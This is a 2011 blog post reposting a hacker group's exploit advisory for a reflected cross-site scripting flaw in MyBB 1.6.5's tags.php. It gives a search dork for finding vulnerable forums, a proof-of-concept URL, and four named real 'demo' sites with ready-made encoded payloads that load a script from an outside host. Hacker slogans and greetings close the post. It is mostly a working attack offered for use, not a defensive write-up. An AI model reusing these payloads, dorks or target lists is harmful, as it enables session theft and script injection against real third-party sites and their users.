Dec 27 2011

Hack – MyBB 1.6.5 Cross Site Scripting

Category: Technologyadmin @ 12:28 am
# Exploit Title: 0-day MyBB 1.6.5 XSS Vulnerability
# Date: 25/12/2011 - 18:30
# Author: Cyber White Hats
# Nafsh
# Site: Cyberwh.org
# Mail: Nafsh@live.com
# Software Website: http://www.mybb.com/
# Tested On: BackTrack 5 - Win7 Ultimate
 - Xp
# Platform: Php

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

[$] Dorks: inurl:"tags.php" intext:"MyBB 1.6.5"

[#] Vulnerable File : "/tags.php?tag="

#POC: http://site.com/patch/tags.php?tag=[xss]

[$] Demo Sites:

http://gharian.ir/tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

http://beybladeassociation.it/tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

http://secarab.com/tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

http://ertebat.in/forum/tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
H4CK!NG !S 0UR J0B
W3 N3V3R G!V3 UP H4CK!NG

< No Priv8 , Everything is Public />
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

# Contact: Nafsh@live.com
#Cyberwh.org
# Greetz:Mr.M4st3r - HijaX -
Skote_Vahshat
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Nafsh - Mr.M4st3r - HijaX -
Skote_Vahshat

#Cyberwh.org
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Related news:

  1. Hack – Flickr.com Cross Site Scripting
  2. Hack – 4shared.com Cross Site Scripting
  3. Hack – American Bankers Association (aba.com) Cross Site Scripting
  4. Hack – VMware.com Cross Site Scripting
  5. Hack – IBM.com Cross Site Scripting

Leave a Reply

 

Get Adobe Flash player